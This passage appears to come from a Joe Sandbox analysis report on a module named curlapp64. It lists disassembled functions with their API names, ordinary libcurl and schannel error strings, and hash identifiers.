                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: freemallocmemmove
                                                                                                                                • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                                                                                                                • API String ID: 2537350866-3891197721
                                                                                                                                • Opcode ID: f9809a0cb9eed080c1fae46c54316533417998db61ac959f26f7e638caeeebd5
                                                                                                                                • Instruction ID: 5db5946acc88636738bfa6ca77c7d4d7463fd9d88dd35ba80eb916433db883b6
                                                                                                                                • Opcode Fuzzy Hash: f9809a0cb9eed080c1fae46c54316533417998db61ac959f26f7e638caeeebd5
                                                                                                                                • Instruction Fuzzy Hash: D271A072B0AB919AEB10CFA6D4446AE33B5EB487E8F416235DE2D977D4DF38A405C340
                                                                                                                                Function 00007FF8A93116F0 Relevance: 10.6, APIs: 7, Instructions: 123networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: memmove$ErrorLastfreefreeaddrinfogetaddrinfomalloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 420754818-0
                                                                                                                                • Opcode ID: 5690689acaa421e89e377b4d98ad99c46781c34d9c6ee45bdbc63379844944fc
                                                                                                                                • Instruction ID: c5f03856c09fbbf935bff50a1c8fb4157dedf422aa55daf099e5ee708a71daab
                                                                                                                                • Opcode Fuzzy Hash: 5690689acaa421e89e377b4d98ad99c46781c34d9c6ee45bdbc63379844944fc
                                                                                                                                • Instruction Fuzzy Hash: 67416532A0EB8596EA658F51E580669B3B5FB48BD0F149136DF9D83B94EF3CE841C700
                                                                                                                                Function 00007FF8A9306290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorIoctlLastsendsetsockopt
                                                                                                                                • String ID: Send failure: %s$send(len=%zu) -> %d, err=%d
                                                                                                                                • API String ID: 2224487826-343019339
                                                                                                                                • Opcode ID: 0fdf7ad55e293d987571af5160d8486bd2c328b03123efad72481fa92db8264f
                                                                                                                                • Instruction ID: 54a4f5e7ce20aef3992d65144eceb5373b6a487c86f8ade9b596019ef8fc0c56
                                                                                                                                • Opcode Fuzzy Hash: 0fdf7ad55e293d987571af5160d8486bd2c328b03123efad72481fa92db8264f
                                                                                                                                • Instruction Fuzzy Hash: B0516D72A09AC596EB608F25E4417AA73B0FB88B98F505232EF8D47759DF3CD185CB00
                                                                                                                                Function 00007FF8A9307F90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 76networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$ErrorLast$getsockname
                                                                                                                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                                                                                                • API String ID: 837846698-2605427207
                                                                                                                                • Opcode ID: 979241306aa7c7a411256f69e4a13ecbbc28351d44a85b130b8ae4283e24c192
                                                                                                                                • Instruction ID: ee45ead9441afd7ae7e72175ee9ed1cff00c91eae38122de7575101f88bfbc96
                                                                                                                                • Opcode Fuzzy Hash: 979241306aa7c7a411256f69e4a13ecbbc28351d44a85b130b8ae4283e24c192
                                                                                                                                • Instruction Fuzzy Hash: 22314322A1DBC292E660CF15E4403EA6370FB997C4F506236EA8D87655DFACD595CB00
                                                                                                                                Function 00007FF8A934E640 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_INCOMPLETE_CREDENTIALS
                                                                                                                                • API String ID: 3939687465-1320471878
                                                                                                                                • Opcode ID: 03152994c3950484c5c98b6f09b6cf5e3df2be0ebc9ea3828cb78d72b3857db1
                                                                                                                                • Instruction ID: c29bade5c65d4c57a0165878d6f9c7e6aee5443740a73821aecc1065be7deab5
                                                                                                                                • Opcode Fuzzy Hash: 03152994c3950484c5c98b6f09b6cf5e3df2be0ebc9ea3828cb78d72b3857db1
                                                                                                                                • Instruction Fuzzy Hash: 53015222A1FE82E1EA629F11A4402BE6371FF88BD5F852031DA4E82790EF3CE545C710
                                                                                                                                Function 00007FF8A934E5F8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_CRYPTO_SYSTEM_INVALID
                                                                                                                                • API String ID: 3939687465-3331766186
                                                                                                                                • Opcode ID: b1bae386a3d65ff28abd1242a99fe727f19cf3943ac4257ccb029480fa423dac
                                                                                                                                • Instruction ID: ecea12577e57527578f452b6414525ba9730022f4ddca2b27c5410ba1fa96a9d
                                                                                                                                • Opcode Fuzzy Hash: b1bae386a3d65ff28abd1242a99fe727f19cf3943ac4257ccb029480fa423dac
                                                                                                                                • Instruction Fuzzy Hash: 19015222A1EEC2A1EA629F11A4402BE6371FF88BD5F852031DA4E82790EF3CE545C710
                                                                                                                                Function 00007FF8A934E604 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_DECRYPT_FAILURE
                                                                                                                                • API String ID: 3939687465-1043736155
                                                                                                                                • Opcode ID: 2c35cf236970ab930637a02230fddc1cfffb66284058033d907bb0a4ca484230
                                                                                                                                • Instruction ID: b62300428de08601200e97f64db9a077d26386c70cc27604842496ed29f1407c
                                                                                                                                • Opcode Fuzzy Hash: 2c35cf236970ab930637a02230fddc1cfffb66284058033d907bb0a4ca484230
                                                                                                                                • Instruction Fuzzy Hash: 9E015622A1FE82A1EA619F11A4402BE6371FF887D5F852031DA4E82790DF3CE545C710
                                                                                                                                Function 00007FF8A934E610 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_POLICY
                                                                                                                                • API String ID: 3939687465-829877842
                                                                                                                                • Opcode ID: d4d8b91f72fff87b202198528f23fdc910b22ffa6555036cbe69808ad8010e3e
                                                                                                                                • Instruction ID: 9df75946d87020dcf0297ed779ecc56fc5bd2225bbe641bf757f494770b8f919
                                                                                                                                • Opcode Fuzzy Hash: d4d8b91f72fff87b202198528f23fdc910b22ffa6555036cbe69808ad8010e3e
                                                                                                                                • Instruction Fuzzy Hash: 00015222A1FE82E1EA629F11A4402BE6371FF88BD5F852031DA4E82790EF3CE545C710
                                                                                                                                Function 00007FF8A934E61C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_REQUIRED
                                                                                                                                • API String ID: 3939687465-3988574617
                                                                                                                                • Opcode ID: 3a3bde5c9ab0fb7f7e326860c92128801c8b0d75ec7503537036e7543c7320be
                                                                                                                                • Instruction ID: 792a01f4a8c567ddcd7c1ec70b20bd91d28aa2bacc1f6250c712f1391c85b8ae
                                                                                                                                • Opcode Fuzzy Hash: 3a3bde5c9ab0fb7f7e326860c92128801c8b0d75ec7503537036e7543c7320be
                                                                                                                                • Instruction Fuzzy Hash: 90015622A1FE82A1EA619F11A4402BE6371FF887D5F852031DA4E82790DF3CE545C710
                                                                                                                                Function 00007FF8A934E628 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_DOWNGRADE_DETECTED
                                                                                                                                • API String ID: 3939687465-1814928707
                                                                                                                                • Opcode ID: e40e7ce7aaa022eaac0eb0474ca994afa18f010793b8621ccf14ea6f630dde15
                                                                                                                                • Instruction ID: 44db0d60ef98bb587a44027c531aff8d40095290121999579276aa46e7ec7a66
                                                                                                                                • Opcode Fuzzy Hash: e40e7ce7aaa022eaac0eb0474ca994afa18f010793b8621ccf14ea6f630dde15
                                                                                                                                • Instruction Fuzzy Hash: A6015622A1FEC2A1EA619F11A4402BEA371FF887D5F852031DA4E82790DF3CE545C710
                                                                                                                                Function 00007FF8A934E634 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_ENCRYPT_FAILURE
                                                                                                                                • API String ID: 3939687465-3371550302
                                                                                                                                • Opcode ID: c95089c4754a777f2387e5c161045ba63b7e950e5af8988961487714c573afcb
                                                                                                                                • Instruction ID: c47553c3e03cbbba42b4bb405968030cd7d1f6cc3c885dcad3af086f9f2e02e3
                                                                                                                                • Opcode Fuzzy Hash: c95089c4754a777f2387e5c161045ba63b7e950e5af8988961487714c573afcb
                                                                                                                                • Instruction Fuzzy Hash: 87015622A1FE82A1FA619F11A4402BE6371FF887D5F852035DA4E82790DF3CE545C714
                                                                                                                                Function 00007FF8A934E5BF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_CERT_EXPIRED
                                                                                                                                • API String ID: 3939687465-3192465694
                                                                                                                                • Opcode ID: 441da43cf9e542e5edd50b273512c7b9ea22a4b41436016054700c454272f4ae
                                                                                                                                • Instruction ID: 2dc1c71e52da772edf5485674efc4f6b461633c2bdca284670afaa052aa3635d
                                                                                                                                • Opcode Fuzzy Hash: 441da43cf9e542e5edd50b273512c7b9ea22a4b41436016054700c454272f4ae
                                                                                                                                • Instruction Fuzzy Hash: 9B015622A1EE82E5EA619F11A4402BE6371FF887D5F852031DA4E82790DF3CE545C714
                                                                                                                                Function 00007FF8A934E5C8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_CERT_UNKNOWN
                                                                                                                                • API String ID: 3939687465-169894802
                                                                                                                                • Opcode ID: 18d95ea0c812e77af67839231a605aeb101d50a50e151c44ca4e4bce1f7a0bf6
                                                                                                                                • Instruction ID: 77d104296574d094461297bb3b10302857ddd7b1a848fcf1919c7429642c33c4
                                                                                                                                • Opcode Fuzzy Hash: 18d95ea0c812e77af67839231a605aeb101d50a50e151c44ca4e4bce1f7a0bf6
                                                                                                                                • Instruction Fuzzy Hash: 5B015222A1EE82A1FA629F11A4402BE6371FF88BD5F852035DA4E82790EF3CE545C714
                                                                                                                                Function 00007FF8A934E5D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_CERT_WRONG_USAGE
                                                                                                                                • API String ID: 3939687465-3896346274
                                                                                                                                • Opcode ID: c523917cea4f88baa68328a1d349acba4bc64ba1872f12e598f7fb40ba3a4714
                                                                                                                                • Instruction ID: cf40019256bde785ce372d69037684d719821908abc318a09ad260b7d9e9b590
                                                                                                                                • Opcode Fuzzy Hash: c523917cea4f88baa68328a1d349acba4bc64ba1872f12e598f7fb40ba3a4714
                                                                                                                                • Instruction Fuzzy Hash: 6E015222A1EE82E1EA629F11A4402BE6371FF88BD5F852031DA4E82790EF3CE545C710
                                                                                                                                Function 00007FF8A934E5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_CONTEXT_EXPIRED
                                                                                                                                • API String ID: 3939687465-1358876214
                                                                                                                                • Opcode ID: 61983125f33651b5802577ff577e31b0029aa78b3f8dc3bb7d7398845e948f08
                                                                                                                                • Instruction ID: b7cfdcc51f3c67951f5dcbe8ff80d7bc8985e28f3ab8b12ec495167e4ef575b6
                                                                                                                                • Opcode Fuzzy Hash: 61983125f33651b5802577ff577e31b0029aa78b3f8dc3bb7d7398845e948f08
                                                                                                                                • Instruction Fuzzy Hash: 2F015222A1EE82B5EA629F11A4402BE6371FF88BD5F852031DA4E82790EF3CE545C710
                                                                                                                                Function 00007FF8A934E5EC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
